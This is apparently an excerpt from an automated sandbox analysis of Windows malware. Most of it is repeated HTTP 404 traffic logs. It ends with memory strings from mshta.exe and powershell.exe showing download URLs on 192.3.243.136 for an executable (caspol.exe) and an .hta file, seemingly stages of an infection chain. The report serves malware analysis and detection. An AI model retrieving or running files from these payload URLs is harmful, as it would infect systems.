Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:07 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:09 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:09 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:11 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:12 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:12 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:14 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:15 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:16 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:17 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:18 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:18 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:19 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:21 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:25 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:26 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:27 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:27 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:28 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:29 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:30 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:31 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:32 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:33 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:34 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:35 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:36 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:37 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:37 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:38 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:39 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:40 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:41 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:42 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:43 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:44 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:45 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:46 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:47 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:48 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:49 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:50 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:51 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:52 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:53 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:54 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:55 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:55 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:56 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:57 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:58 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:00 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:01 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:02 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:03 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:03 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:04 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:05 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:06 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:07 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:08 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:09 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:10 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:11 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:12 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:13 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:14 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:58:15 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/
                    Source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/55/caspol.e
                    Source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/55/caspol.exe
                    Source: powershell.exe, 0000001F.00000002.523691740.000000001AF69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/55/caspol.exe6
                    Source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/55/caspol.exep
                    Source: mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431264903.00000000034DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432134757.00000000042AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431156487.00000000042AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506803305.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.507346149.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506294361.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.504008484.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512306912.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.507364961.0000000002C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
                    Source: mshta.exe, 0000001D.00000002.511914905.00000000001DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta$1
